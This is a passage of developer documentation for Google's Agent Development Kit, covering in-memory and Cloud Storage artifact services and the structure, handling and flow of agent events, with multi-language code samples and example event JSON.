`types.Part`, where each list element is a version. - Java: Uses nested `HashMap` instances (`private final Map>>>> artifacts;`) held in memory. The keys at each level are `appName`, `userId`, `sessionId`, and `filename` respectively. The innermost `List` stores the versions of the artifact, where the list index corresponds to the version number. - **Key Features:** - **Simplicity:** Requires no external setup or dependencies beyond the core ADK library. - **Speed:** Operations are typically very fast as they involve in-memory map/dictionary lookups and list manipulations. - **Ephemeral:** All stored artifacts are **lost** when the application process terminates. Data does not persist between application restarts. - **Use Cases:** - Ideal for local development and testing where persistence is not required. - Suitable for short-lived demonstrations or scenarios where artifact data is purely temporary within a single run of the application. - **Instantiation:** ```python from google.adk.artifacts import InMemoryArtifactService # Simply instantiate the class in_memory_service_py = InMemoryArtifactService() # Then pass it to the Runner # runner = Runner(..., artifact_service=in_memory_service_py) ``` ```typescript import { InMemoryArtifactService } from '@google/adk'; // Simply instantiate the class const inMemoryService = new InMemoryArtifactService(); // This instance would then be provided to your Runner. // const runner = new InMemoryRunner({ // /* other services */, // artifactService: inMemoryService // }); ``` ```go import ( "google.golang.org/adk/artifactservice" ) // Simply instantiate the service artifactService := artifact.InMemoryService() log.Printf("InMemoryArtifactService (Go) instantiated: %T", artifactService) // Use the service in your runner // r, _ := runner.New(runner.Config{ // Agent: agent, // AppName: "my_app", // SessionService: sessionService, // ArtifactService: artifactService, // }) ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.adk.artifacts.InMemoryArtifactService; public class InMemoryServiceSetup { public static void main(String[] args) { // Simply instantiate the class BaseArtifactService inMemoryServiceJava = new InMemoryArtifactService(); System.out.println("InMemoryArtifactService (Java) instantiated: " + inMemoryServiceJava.getClass().getName()); // This instance would then be provided to your Runner. // Runner runner = new Runner( // /* other services */, // inMemoryServiceJava // ); } } ``` ### GcsArtifactService - **Storage Mechanism:** Leverages Google Cloud Storage (GCS) for persistent artifact storage. Each version of an artifact is stored as a separate object (blob) within a specified GCS bucket. - **Object Naming Convention:** It constructs GCS object names (blob names) using a hierarchical path structure. - **Key Features:** - **Persistence:** Artifacts stored in GCS persist across application restarts and deployments. - **Scalability:** Leverages the scalability and durability of Google Cloud Storage. - **Versioning:** Explicitly stores each version as a distinct GCS object. The `saveArtifact` method in `GcsArtifactService`. - **Permissions Required:** The application environment needs appropriate credentials (e.g., Application Default Credentials) and IAM permissions to read from and write to the specified GCS bucket. - **Use Cases:** - Production environments requiring persistent artifact storage. - Scenarios where artifacts need to be shared across different application instances or services (by accessing the same GCS bucket). - Applications needing long-term storage and retrieval of user or session data. - **Instantiation:** ```python from google.adk.artifacts import GcsArtifactService # Specify the GCS bucket name gcs_bucket_name_py = "your-gcs-bucket-for-adk-artifacts" # Replace with your bucket name try: gcs_service_py = GcsArtifactService(bucket_name=gcs_bucket_name_py) print(f"Python GcsArtifactService initialized for bucket: {gcs_bucket_name_py}") # Ensure your environment has credentials to access this bucket. # e.g., via Application Default Credentials (ADC) # Then pass it to the Runner # runner = Runner(..., artifact_service=gcs_service_py) except Exception as e: # Catch potential errors during GCS client initialization (e.g., auth issues) print(f"Error initializing Python GcsArtifactService: {e}") # Handle the error appropriately - maybe fall back to InMemory or raise ``` ```java import com.google.adk.artifacts.BaseArtifactService; import com.google.adk.artifacts.GcsArtifactService; import com.google.cloud.storage.Storage; import com.google.cloud.storage.StorageOptions; public class GcsServiceSetup { public static void main(String[] args) { // Specify the GCS bucket name String gcsBucketNameJava = "your-gcs-bucket-for-adk-artifacts"; // Replace with your bucket name try { // Initialize the GCS Storage client. // This will use Application Default Credentials by default. // Ensure the environment is configured correctly (e.g., GOOGLE_APPLICATION_CREDENTIALS). Storage storageClient = StorageOptions.getDefaultInstance().getService(); // Instantiate the GcsArtifactService BaseArtifactService gcsServiceJava = new GcsArtifactService(gcsBucketNameJava, storageClient); System.out.println( "Java GcsArtifactService initialized for bucket: " + gcsBucketNameJava); // This instance would then be provided to your Runner. // Runner runner = new Runner( // /* other services */, // gcsServiceJava // ); } catch (Exception e) { // Catch potential errors during GCS client initialization (e.g., auth, permissions) System.err.println("Error initializing Java GcsArtifactService: " + e.getMessage()); e.printStackTrace(); // Handle the error appropriately } } } ``` Choosing the appropriate `ArtifactService` implementation depends on your application's requirements for data persistence, scalability, and operational environment. ## Best Practices To use artifacts effectively and maintainably: - **Choose the Right Service:** Use `InMemoryArtifactService` for rapid prototyping, testing, and scenarios where persistence isn't needed. Use `GcsArtifactService` (or implement your own `BaseArtifactService` for other backends) for production environments requiring data persistence and scalability. - **Meaningful Filenames:** Use clear, descriptive filenames. Including relevant extensions (`.pdf`, `.png`, `.wav`) helps humans understand the content, even though the `mime_type` dictates programmatic handling. Establish conventions for temporary vs. persistent artifact names. - **Specify Correct MIME Types:** Always provide an accurate `mime_type` when creating the `types.Part` for `save_artifact`. This is critical for applications or tools that later `load_artifact` to interpret the `bytes` data correctly. Use standard IANA MIME types where possible. - **Understand Versioning:** Remember that `load_artifact()` without a specific `version` argument retrieves the *latest* version. If your logic depends on a specific historical version of an artifact, be sure to provide the integer version number when loading. - **Use Namespacing (`user:`) Deliberately:** Only use the `"user:"` prefix for filenames when the data truly belongs to the user and should be accessible across all their sessions. For data specific to a single conversation or session, use regular filenames without the prefix. - **Error Handling:** - Always check if an `artifact_service` is actually configured before calling context methods (`save_artifact`, `load_artifact`, `list_artifacts`) – they will raise a `ValueError` if the service is `None`. - Check the return value of `load_artifact`, as it will be `None` if the artifact or version doesn't exist. Don't assume it always returns a `Part`. - Be prepared to handle exceptions from the underlying storage service, especially with `GcsArtifactService` (e.g., `google.api_core.exceptions.Forbidden` for permission issues, `NotFound` if the bucket doesn't exist, network errors). - **Size Considerations:** Artifacts are suitable for typical file sizes, but be mindful of potential costs and performance impacts with extremely large files, especially with cloud storage. `InMemoryArtifactService` can consume significant memory if storing many large artifacts. Evaluate if very large data might be better handled through direct GCS links or other specialized storage solutions rather than passing entire byte arrays in-memory. - **Cleanup Strategy:** For persistent storage like `GcsArtifactService`, artifacts remain until explicitly deleted. If artifacts represent temporary data or have a limited lifespan, implement a strategy for cleanup. This might involve: - Using GCS lifecycle policies on the bucket. - Building specific tools or administrative functions that utilize the `artifact_service.delete_artifact` method (note: delete is *not* exposed via context objects for safety). - Carefully managing filenames to allow pattern-based deletion if needed. # Events Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Events are the fundamental units of information flow within the Agent Development Kit (ADK). They represent every significant occurrence during an agent's interaction lifecycle, from initial user input to the final response and all the steps in between. Understanding events is crucial because they are the primary way components communicate, state is managed, and control flow is directed. ## What Events Are and Why They Matter An `Event` in ADK is an immutable record representing a specific point in the agent's execution. It captures user messages, agent replies, requests to use tools (function calls), tool results, state changes, control signals, and errors. Technically, it's an instance of the `google.adk.events.Event` class, which builds upon the basic `LlmResponse` structure by adding essential ADK-specific metadata and an `actions` payload. ```python # Conceptual Structure of an Event (Python) # from google.adk.events import Event, EventActions # from google.genai import types # class Event(LlmResponse): # Simplified view # # --- LlmResponse fields --- # content: Optional[types.Content] # partial: Optional[bool] # # ... other response fields ... # # --- ADK specific additions --- # author: str # 'user' or agent name # invocation_id: str # ID for the whole interaction run # id: str # Unique ID for this specific event # timestamp: float # Creation time # actions: EventActions # Important for side-effects & control # branch: Optional[str] # Hierarchy path # # ... ``` In Go, this is a struct of type `google.golang.org/adk/session.Event`. ```go // Conceptual Structure of an Event (Go - See session/session.go) // Simplified view based on the session.Event struct type Event struct { // --- Fields from embedded model.LLMResponse --- model.LLMResponse // --- ADK specific additions --- Author string // 'user' or agent name InvocationID string // ID for the whole interaction run ID string // Unique ID for this specific event Timestamp time.Time // Creation time Actions EventActions // Important for side-effects & control Branch string // Hierarchy path // ... other fields } // model.LLMResponse contains the Content field type LLMResponse struct { Content *genai.Content // ... other fields } ``` In Java, this is an instance of the `com.google.adk.events.Event` class. It also builds upon a basic response structure by adding essential ADK-specific metadata and an `actions` payload. ```java // Conceptual Structure of an Event (Java - See com.google.adk.events.Event.java) // Simplified view based on the provided com.google.adk.events.Event.java // public class Event extends JsonBaseModel { // // --- Fields analogous to LlmResponse --- // private Optional content; // private Optional partial; // // ... other response fields like errorCode, errorMessage ... // // --- ADK specific additions --- // private String author; // 'user' or agent name // private String invocationId; // ID for the whole interaction run // private String id; // Unique ID for this specific event // private long timestamp; // Creation time (epoch milliseconds) // private EventActions actions; // Important for side-effects & control // private Optional branch; // Hierarchy path // // ... other fields like turnComplete, longRunningToolIds etc. // } ``` Events are central to ADK's operation for several key reasons: 1. **Communication:** They serve as the standard message format between the user interface, the `Runner`, agents, the LLM, and tools. Everything flows as an `Event`. 1. **Signaling State & Artifact Changes:** Events carry instructions for state modifications and track artifact updates. The `SessionService` uses these signals to ensure persistence. In Python changes are signaled via `event.actions.state_delta` and `event.actions.artifact_delta`. 1. **Control Flow:** Specific fields like `event.actions.transfer_to_agent` or `event.actions.escalate` act as signals that direct the framework, determining which agent runs next or if a loop should terminate. 1. **History & Observability:** The sequence of events recorded in `session.events` provides a complete, chronological history of an interaction, invaluable for debugging, auditing, and understanding agent behavior step-by-step. In essence, the entire process, from a user's query to the agent's final answer, is orchestrated through the generation, interpretation, and processing of `Event` objects. ## Understanding and Using Events As a developer, you'll primarily interact with the stream of events yielded by the `Runner`. Here's how to understand and extract information from them: Note The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `event.content()` in Python, `event.content().get().parts()` in Java). Refer to the language-specific API documentation for details. ### Identifying Event Origin and Type Quickly determine what an event represents by checking: - **Who sent it? (`event.author`)** - `'user'`: Indicates input directly from the end-user. - `'AgentName'`: Indicates output or action from a specific agent (e.g., `'WeatherAgent'`, `'SummarizerAgent'`). - **What's the main payload? (`event.content` and `event.content.parts`)** - **Text:** Indicates a conversational message. For Python, check if `event.content.parts[0].text` exists. For Java, check if `event.content()` is present, its `parts()` are present and not empty, and the first part's `text()` is present. - **Tool Call Request:** Check `event.get_function_calls()`. If not empty, the LLM is asking to execute one or more tools. Each item in the list has `.name` and `.args`. - **Tool Result:** Check `event.get_function_responses()`. If not empty, this event carries the result(s) from tool execution(s). Each item has `.name` and `.response` (the dictionary returned by the tool). *Note:* For history structuring, the `role` inside the `content` is often `'user'`, but the event `author` is typically the agent that requested the tool call. - **Is it streaming output? (`event.partial`)** Indicates whether this is an incomplete chunk of text from the LLM. - `True`: More text will follow. - `False` or `None`/`Optional.empty()`: This part of the content is complete (though the overall turn might not be finished if `turn_complete` is also false). ```python # Pseudocode: Basic event identification (Python) # async for event in runner.run_async(...): # print(f"Event from: {event.author}") # # if event.content and event.content.parts: # if event.get_function_calls(): # print(" Type: Tool Call Request") # elif event.get_function_responses(): # print(" Type: Tool Result") # elif event.content.parts[0].text: # if event.partial: # print(" Type: Streaming Text Chunk") # else: # print(" Type: Complete Text Message") # else: # print(" Type: Other Content (e.g., code result)") # elif event.actions and (event.actions.state_delta or event.actions.artifact_delta): # print(" Type: State/Artifact Update") # else: # print(" Type: Control Signal or Other") ``` ```go // Pseudocode: Basic event identification (Go) import ( "fmt" "google.golang.org/adk/session" "google.golang.org/genai" ) func hasFunctionCalls(content *genai.Content) bool { if content == nil { return false } for _, part := range content.Parts { if part.FunctionCall != nil { return true } } return false } func hasFunctionResponses(content *genai.Content) bool { if content == nil { return false } for _, part := range content.Parts { if part.FunctionResponse != nil { return true } } return false } func processEvents(events <-chan *session.Event) { for event := range events { fmt.Printf("Event from: %s\n", event.Author) if event.LLMResponse != nil && event.LLMResponse.Content != nil { if hasFunctionCalls(event.LLMResponse.Content) { fmt.Println(" Type: Tool Call Request") } else if hasFunctionResponses(event.LLMResponse.Content) { fmt.Println(" Type: Tool Result") } else if len(event.LLMResponse.Content.Parts) > 0 { if event.LLMResponse.Content.Parts[0].Text != "" { if event.LLMResponse.Partial { fmt.Println(" Type: Streaming Text Chunk") } else { fmt.Println(" Type: Complete Text Message") } } else { fmt.Println(" Type: Other Content (e.g., code result)") } } } else if len(event.Actions.StateDelta) > 0 { fmt.Println(" Type: State Update") } else { fmt.Println(" Type: Control Signal or Other") } } } ``` ```java // Pseudocode: Basic event identification (Java) // import com.google.genai.types.Content; // import com.google.adk.events.Event; // import com.google.adk.events.EventActions; // runner.runAsync(...).forEach(event -> { // Assuming a synchronous stream or reactive stream // System.out.println("Event from: " + event.author()); // // if (event.content().isPresent()) { // Content content = event.content().get(); // if (!event.functionCalls().isEmpty()) { // System.out.println(" Type: Tool Call Request"); // } else if (!event.functionResponses().isEmpty()) { // System.out.println(" Type: Tool Result"); // } else if (content.parts().isPresent() && !content.parts().get().isEmpty() && // content.parts().get().get(0).text().isPresent()) { // if (event.partial().orElse(false)) { // System.out.println(" Type: Streaming Text Chunk"); // } else { // System.out.println(" Type: Complete Text Message"); // } // } else { // System.out.println(" Type: Other Content (e.g., code result)"); // } // } else if (event.actions() != null && // ((event.actions().stateDelta() != null && !event.actions().stateDelta().isEmpty()) || // (event.actions().artifactDelta() != null && !event.actions().artifactDelta().isEmpty()))) { // System.out.println(" Type: State/Artifact Update"); // } else { // System.out.println(" Type: Control Signal or Other"); // } // }); ``` ### Extracting Key Information Once you know the event type, access the relevant data: - **Text Content:** Always check for the presence of content and parts before accessing text. In Python its `text = event.content.parts[0].text`. - **Function Call Details:** ```python calls = event.get_function_calls() if calls: for call in calls: tool_name = call.name arguments = call.args # This is usually a dictionary print(f" Tool: {tool_name}, Args: {arguments}") # Application might dispatch execution based on this ``` ```go import ( "fmt" "google.golang.org/adk/session" "google.golang.org/genai" ) func handleFunctionCalls(event *session.Event) { if event.LLMResponse == nil || event.LLMResponse.Content == nil { return } calls := event.Content.FunctionCalls() if len(calls) > 0 { for _, call := range calls { toolName := call.Name arguments := call.Args fmt.Printf(" Tool: %s, Args: %v\n", toolName, arguments) // Application might dispatch execution based on this } } } ``` ```java import com.google.genai.types.FunctionCall; import com.google.common.collect.ImmutableList; import java.util.Map; ImmutableList calls = event.functionCalls(); // from Event.java if (!calls.isEmpty()) { for (FunctionCall call : calls) { String toolName = call.name().get(); // args is Optional> Map arguments = call.args().get(); System.out.println(" Tool: " + toolName + ", Args: " + arguments); // Application might dispatch execution based on this } } ``` - **Function Response Details:** ```python responses = event.get_function_responses() if responses: for response in responses: tool_name = response.name result_dict = response.response # The dictionary returned by the tool print(f" Tool Result: {tool_name} -> {result_dict}") ``` ```go import ( "fmt" "google.golang.org/adk/session" "google.golang.org/genai" ) func handleFunctionResponses(event *session.Event) { if event.LLMResponse == nil || event.LLMResponse.Content == nil { return } responses := event.Content.FunctionResponses() if len(responses) > 0 { for _, response := range responses { toolName := response.Name result := response.Response fmt.Printf(" Tool Result: %s -> %v\n", toolName, result) } } } ``` ```java import com.google.genai.types.FunctionResponse; import com.google.common.collect.ImmutableList; import java.util.Map; ImmutableList responses = event.functionResponses(); // from Event.java if (!responses.isEmpty()) { for (FunctionResponse response : responses) { String toolName = response.name().get(); Map result= response.response().get(); // Check before getting the response System.out.println(" Tool Result: " + toolName + " -> " + result); } } ``` - **Identifiers:** - `event.id`: Unique ID for this specific event instance. - `event.invocation_id`: ID for the entire user-request-to-final-response cycle this event belongs to. Useful for logging and tracing. ### Detecting Actions and Side Effects The `event.actions` object signals changes that occurred or should occur. Always check if `event.actions` and it's fields/ methods exists before accessing them. - **State Changes:** Gives you a collection of key-value pairs that were modified in the session state during the step that produced this event. `delta = event.actions.state_delta` (a dictionary of `{key: value}` pairs). ```python if event.actions and event.actions.state_delta: print(f" State changes: {event.actions.state_delta}") # Update local UI or application state if necessary ``` `delta := event.Actions.StateDelta` (a `map[string]any`) ```go import ( "fmt" "google.golang.org/adk/session" ) func handleStateChanges(event *session.Event) { if len(event.Actions.StateDelta) > 0 { fmt.Printf(" State changes: %v\n", event.Actions.StateDelta) // Update local UI or application state if necessary } } ``` `ConcurrentMap delta = event.actions().stateDelta();` ```java import java.util.concurrent.ConcurrentMap; import com.google.adk.events.EventActions; EventActions actions = event.actions(); // Assuming event.actions() is not null if (actions != null && actions.stateDelta() != null && !actions.stateDelta().isEmpty()) { ConcurrentMap stateChanges = actions.stateDelta(); System.out.println(" State changes: " + stateChanges); // Update local UI or application state if necessary } ``` - **Artifact Saves:** Gives you a collection indicating which artifacts were saved and their new version number (or relevant `Part` information). `artifact_changes = event.actions.artifact_delta` (a dictionary of `{filename: version}`). ```python if event.actions and event.actions.artifact_delta: print(f" Artifacts saved: {event.actions.artifact_delta}") # UI might refresh an artifact list ``` `artifactChanges := event.Actions.ArtifactDelta` (a `map[string]artifact.Artifact`) ```go import ( "fmt" "google.golang.org/adk/artifact" "google.golang.org/adk/session" ) func handleArtifactChanges(event *session.Event) { if len(event.Actions.ArtifactDelta) > 0 { fmt.Printf(" Artifacts saved: %v\n", event.Actions.ArtifactDelta) // UI might refresh an artifact list // Iterate through event.Actions.ArtifactDelta to get filename and artifact.Artifact details for filename, art := range event.Actions.ArtifactDelta { fmt.Printf(" Filename: %s, Version: %d, MIMEType: %s\n", filename, art.Version, art.MIMEType) } } } ``` `ConcurrentMap artifactChanges = event.actions().artifactDelta();` ```java import java.util.concurrent.ConcurrentMap; import com.google.genai.types.Part; import com.google.adk.events.EventActions; EventActions actions = event.actions(); // Assuming event.actions() is not null if (actions != null && actions.artifactDelta() != null && !actions.artifactDelta().isEmpty()) { ConcurrentMap artifactChanges = actions.artifactDelta(); System.out.println(" Artifacts saved: " + artifactChanges); // UI might refresh an artifact list // Iterate through artifactChanges.entrySet() to get filename and Part details } ``` - **Control Flow Signals:** Check boolean flags or string values: - `event.actions.transfer_to_agent` (string): Control should pass to the named agent. - `event.actions.escalate` (bool): A loop should terminate. - `event.actions.skip_summarization` (bool): A tool result should not be summarized by the LLM. ```python if event.actions: if event.actions.transfer_to_agent: print(f" Signal: Transfer to {event.actions.transfer_to_agent}") if event.actions.escalate: print(" Signal: Escalate (terminate loop)") if event.actions.skip_summarization: print(" Signal: Skip summarization for tool result") ``` - `event.Actions.TransferToAgent` (string): Control should pass to the named agent. - `event.Actions.Escalate` (bool): A loop should terminate. - `event.Actions.SkipSummarization` (bool): A tool result should not be summarized by the LLM. ```go import ( "fmt" "google.golang.org/adk/session" ) func handleControlFlow(event *session.Event) { if event.Actions.TransferToAgent != "" { fmt.Printf(" Signal: Transfer to %s\n", event.Actions.TransferToAgent) } if event.Actions.Escalate { fmt.Println(" Signal: Escalate (terminate loop)") } if event.Actions.SkipSummarization { fmt.Println(" Signal: Skip summarization for tool result") } } ``` - `event.actions().transferToAgent()` (returns `Optional`): Control should pass to the named agent. - `event.actions().escalate()` (returns `Optional`): A loop should terminate. - `event.actions().skipSummarization()` (returns `Optional`): A tool result should not be summarized by the LLM. ```java import com.google.adk.events.EventActions; import java.util.Optional; EventActions actions = event.actions(); // Assuming event.actions() is not null if (actions != null) { Optional transferAgent = actions.transferToAgent(); if (transferAgent.isPresent()) { System.out.println(" Signal: Transfer to " + transferAgent.get()); } Optional escalate = actions.escalate(); if (escalate.orElse(false)) { // or escalate.isPresent() && escalate.get() System.out.println(" Signal: Escalate (terminate loop)"); } Optional skipSummarization = actions.skipSummarization(); if (skipSummarization.orElse(false)) { // or skipSummarization.isPresent() && skipSummarization.get() System.out.println(" Signal: Skip summarization for tool result"); } } ``` ### Determining if an Event is a "Final" Response Use the built-in helper method `event.is_final_response()` to identify events suitable for display as the agent's complete output for a turn. - **Purpose:** Filters out intermediate steps (like tool calls, partial streaming text, internal state updates) from the final user-facing message(s). - **When `True`?** 1. The event contains a tool result (`function_response`) and `skip_summarization` is `True`. 1. The event contains a tool call (`function_call`) for a tool marked as `is_long_running=True`. In Java, check if the `longRunningToolIds` list is empty: - `event.longRunningToolIds().isPresent() && !event.longRunningToolIds().get().isEmpty()` is `true`. 1. OR, **all** of the following are met: - No function calls (`get_function_calls()` is empty). - No function responses (`get_function_responses()` is empty). - Not a partial stream chunk (`partial` is not `True`). - Doesn't end with a code execution result that might need further processing/display. - **Usage:** Filter the event stream in your application logic. ```python # Pseudocode: Handling final responses in application (Python) # full_response_text = "" # async for event in runner.run_async(...): # # Accumulate streaming text if needed... # if event.partial and event.content and event.content.parts and event.content.parts[0].text: # full_response_text += event.content.parts[0].text # # # Check if it's a final, displayable event # if event.is_final_response(): # print("\n--- Final Output Detected ---") # if event.content and event.content.parts and event.content.parts[0].text: # # If it's the final part of a stream, use accumulated text # final_text = full_response_text + (event.content.parts[0].text if not event.partial else "") # print(f"Display to user: {final_text.strip()}") # full_response_text = "" # Reset accumulator # elif event.actions and event.actions.skip_summarization and event.get_function_responses(): # # Handle displaying the raw tool result if needed # response_data = event.get_function_responses()[0].response # print(f"Display raw tool result: {response_data}") # elif hasattr(event, 'long_running_tool_ids') and event.long_running_tool_ids: # print("Display message: Tool is running in background...") # else: # # Handle other types of final responses if applicable # print("Display: Final non-textual response or signal.") ``` ```go // Pseudocode: Handling final responses in application (Go) import ( "fmt" "strings" "google.golang.org/adk/session" "google.golang.org/genai" ) // isFinalResponse checks if an event is a final response suitable for display. func isFinalResponse(event *session.Event) bool { if event.LLMResponse != nil { // Condition 1: Tool result with skip summarization. if event.LLMResponse.Content != nil && len(event.LLMResponse.Content.FunctionResponses()) > 0 && event.Actions.SkipSummarization { return true } // Condition 2: Long-running tool call. if len(event.LongRunningToolIDs) > 0 { return true } // Condition 3: A complete message without tool calls or responses. if (event.LLMResponse.Content == nil || (len(event.LLMResponse.Content.FunctionCalls()) == 0 && len(event.LLMResponse.Content.FunctionResponses()) == 0)) && !event.LLMResponse.Partial { return true } } return false } func handleFinalResponses() { var fullResponseText strings.Builder // for event := range runner.Run(...) { // Example loop // // Accumulate streaming text if needed... // if event.LLMResponse != nil && event.LLMResponse.Partial && event.LLMResponse.Content != nil { // if len(event.LLMResponse.Content.Parts) > 0 && event.LLMResponse.Content.Parts[0].Text != "" { // fullResponseText.WriteString(event.LLMResponse.Content.Parts[0].Text) // } // } // // // Check if it's a final, displayable event // if isFinalResponse(event) { // fmt.Println("\n--- Final Output Detected ---") // if event.LLMResponse != nil && event.LLMResponse.Content != nil { // if len(event.LLMResponse.Content.Parts) > 0 && event.LLMResponse.Content.Parts[0].Text != "" { // // If it's the final part of a stream, use accumulated text // finalText := fullResponseText.String() // if !event.LLMResponse.Partial { // finalText += event.LLMResponse.Content.Parts[0].Text // } // fmt.Printf("Display to user: %s\n", strings.TrimSpace(finalText)) // fullResponseText.Reset() // Reset accumulator // } // } else if event.Actions.SkipSummarization && event.LLMResponse.Content != nil && len(event.LLMResponse.Content.FunctionResponses()) > 0 { // // Handle displaying the raw tool result if needed // responseData := event.LLMResponse.Content.FunctionResponses()[0].Response // fmt.Printf("Display raw tool result: %v\n", responseData) // } else if len(event.LongRunningToolIDs) > 0 { // fmt.Println("Display message: Tool is running in background...") // } else { // // Handle other types of final responses if applicable // fmt.Println("Display: Final non-textual response or signal.") // } // } // } } ``` ```java // Pseudocode: Handling final responses in application (Java) import com.google.adk.events.Event; import com.google.genai.types.Content; import com.google.genai.types.FunctionResponse; import java.util.Map; StringBuilder fullResponseText = new StringBuilder(); runner.run(...).forEach(event -> { // Assuming a stream of events // Accumulate streaming text if needed... if (event.partial().orElse(false) && event.content().isPresent()) { event.content().flatMap(Content::parts).ifPresent(parts -> { if (!parts.isEmpty() && parts.get(0).text().isPresent()) { fullResponseText.append(parts.get(0).text().get()); } }); } // Check if it's a final, displayable event if (event.finalResponse()) { // Using the method from Event.java System.out.println("\n--- Final Output Detected ---"); if (event.content().isPresent() && event.content().flatMap(Content::parts).map(parts -> !parts.isEmpty() && parts.get(0).text().isPresent()).orElse(false)) { // If it's the final part of a stream, use accumulated text String eventText = event.content().get().parts().get().get(0).text().get(); String finalText = fullResponseText.toString() + (event.partial().orElse(false) ? "" : eventText); System.out.println("Display to user: " + finalText.trim()); fullResponseText.setLength(0); // Reset accumulator } else if (event.actions() != null && event.actions().skipSummarization().orElse(false) && !event.functionResponses().isEmpty()) { // Handle displaying the raw tool result if needed, // especially if finalResponse() was true due to other conditions // or if you want to display skipped summarization results regardless of finalResponse() Map responseData = event.functionResponses().get(0).response().get(); System.out.println("Display raw tool result: " + responseData); } else if (event.longRunningToolIds().isPresent() && !event.longRunningToolIds().get().isEmpty()) { // This case is covered by event.finalResponse() System.out.println("Display message: Tool is running in background..."); } else { // Handle other types of final responses if applicable System.out.println("Display: Final non-textual response or signal."); } } }); ``` By carefully examining these aspects of an event, you can build robust applications that react appropriately to the rich information flowing through the ADK system. ## How Events Flow: Generation and Processing Events are created at different points and processed systematically by the framework. Understanding this flow helps clarify how actions and history are managed. - **Generation Sources:** - **User Input:** The `Runner` typically wraps initial user messages or mid-conversation inputs into an `Event` with `author='user'`. - **Agent Logic:** Agents (`BaseAgent`, `LlmAgent`) explicitly `yield Event(...)` objects (setting `author=self.name`) to communicate responses or signal actions. - **LLM Responses:** The ADK model integration layer translates raw LLM output (text, function calls, errors) into `Event` objects, authored by the calling agent. - **Tool Results:** After a tool executes, the framework generates an `Event` containing the `function_response`. The `author` is typically the agent that requested the tool, while the `role` inside the `content` is set to `'user'` for the LLM history. - **Processing Flow:** 1. **Yield/Return:** An event is generated and yielded (Python) or returned/emitted (Java) by its source. 1. **Runner Receives:** The main `Runner` executing the agent receives the event. 1. **SessionService Processing:** The `Runner` sends the event to the configured `SessionService`. This is a critical step: - **Applies Deltas:** The service merges `event.actions.state_delta` into `session.state` and updates internal records based on `event.actions.artifact_delta`. (Note: The actual artifact *saving* usually happened earlier when `context.save_artifact` was called). - **Finalizes Metadata:** Assigns a unique `event.id` if not present, may update `event.timestamp`. - **Persists to History:** Appends the processed event to the `session.events` list. 1. **External Yield:** The `Runner` yields (Python) or returns/emits (Java) the processed event outwards to the calling application (e.g., the code that invoked `runner.run_async`). This flow ensures that state changes and history are consistently recorded alongside the communication content of each event. ## Common Event Examples (Illustrative Patterns) Here are concise examples of typical events you might see in the stream: - **User Input:** ```json { "author": "user", "invocation_id": "e-xyz...", "content": {"parts": [{"text": "Book a flight to London for next Tuesday"}]} // actions usually empty } ``` - **Agent Final Text Response:** (`is_final_response() == True`) ```json { "author": "TravelAgent", "invocation_id": "e-xyz...", "content": {"parts": [{"text": "Okay, I can help with that. Could you confirm the departure city?"}]}, "partial": false, "turn_complete": true // actions might have state delta, etc. } ``` - **Agent Streaming Text Response:** (`is_final_response() == False`) ```json { "author": "SummaryAgent", "invocation_id": "e-abc...", "content": {"parts": [{"text": "The document discusses three main points:"}]}, "partial": true, "turn_complete": false } // ... more partial=True events follow ... ``` - **Tool Call Request (by LLM):** (`is_final_response() == False`) ```json { "author": "TravelAgent", "invocation_id": "e-xyz...", "content": {"parts": [{"function_call": {"name": "find_airports", "args": {"city": "London"}}}]} // actions usually empty } ``` - **Tool Result Provided (to LLM):** (`is_final_response()` depends on `skip_summarization`) ```json { "author": "TravelAgent", // Author is agent that requested the call "invocation_id": "e-xyz...", "content": { "role": "user", // Role for LLM history "parts": [{"function_response": {"name": "find_airports", "response": {"result": ["LHR", "LGW", "STN"]}}}] } // actions might have skip_summarization=True } ``` - **State/Artifact Update Only:** (`is_final_response() == False`) ```json { "author": "InternalUpdater", "invocation_id": "e-def...", "content": null, "actions": { "state_delta": {"user_status": "verified"}, "artifact_delta": {"verification_doc.pdf": 2} } } ``` - **Agent Transfer Signal:** (`is_final_response() == False`) ```json { "author": "OrchestratorAgent", "invocation_id": "e-789...", "content": {"parts": [{"function_call": {"name": "transfer_to_agent", "args": {"agent_name": "BillingAgent"}}}]}, "actions": {"transfer_to_agent": "BillingAgent"} // Added by framework } ``` - **Loop Escalation Signal:** (`is_final_response() == False`) ```json { "author": "CheckerAgent", "invocation_id": "e-loop...", "content": {"parts": [{"text": "Maximum retries reached."}]}, // Optional content "actions": {"escalate": true} } ``` ## Additional Context and Event Details Beyond the core concepts, here are a few specific details about context and events that are important for certain use cases: 1. **`ToolContext.function_call_id` (Linking Tool Actions):** - When an LLM requests a tool (FunctionCall), that request has an ID. The `ToolContext` provided to your tool function includes this `function_call_id`. - **Importance:** This ID is crucial for linking actions like authentication back to the specific tool request that initiated them, especially if multiple tools are called in one turn. The framework uses this ID internally. 1. **How State/Artifact Changes are Recorded:** - When you modify state or save an artifact using `CallbackContext` or `ToolContext`, these changes aren't immediately written to persistent storage. - Instead, they populate the `state_delta` and `artifact_delta` fields within the `EventActions` object. - This `EventActions` object is attached to the *next event* generated after the change (e.g., the agent's response or a tool result event). - The `SessionService.append_event` method reads these deltas from the incoming event and applies them to the session's persistent state and artifact records. This ensures changes are tied chronologically to the event stream. 1. **State Scope Prefixes (`app:`, `user:`, `temp:`):** - When managing state via `context.state`, you can optionally use prefixes: - `app:my_setting`: Suggests state relevant to the entire application (requires a persistent `SessionService`). - `user:user_preference`: Suggests state relevant to the specific user across sessions (requires a persistent `SessionService`). - `temp:intermediate_result` or no prefix: Typically session-specific or temporary state for the current invocation. - The underlying `SessionService` determines how these prefixes are handled for persistence. 1. **Error Events:** - An `Event` can represent an error. Check the `event.error_code` and `event.error_message` fields (inherited from `LlmResponse`). - Errors might originate from the LLM (e.g., safety filters, resource limits) or potentially be packaged by the framework if a tool fails critically. Check tool `FunctionResponse` content for typical tool-specific errors. ```json // Example Error Event (conceptual) { "author": "LLMAgent", "invocation_id": "e-err...", "content": null, "error_code": "SAFETY_FILTER_TRIGGERED", "error_message": "Response blocked due to safety settings.", "actions": {} } ``` These details provide a more complete picture for advanced use cases involving tool authentication, state persistence scope, and error handling within the event stream. ## Best Practices for Working with Events To use events effectively in your ADK applications: - **Clear Authorship:** When building custom agents, ensure correct attribution for agent actions in the history. The framework generally handles authorship correctly for LLM/tool events. Use `yield Event(author=self.name, ...)` in `BaseAgent` subclasses. In custom agent `Run` methods, the framework typically handles authorship. If creating an event manually, set the 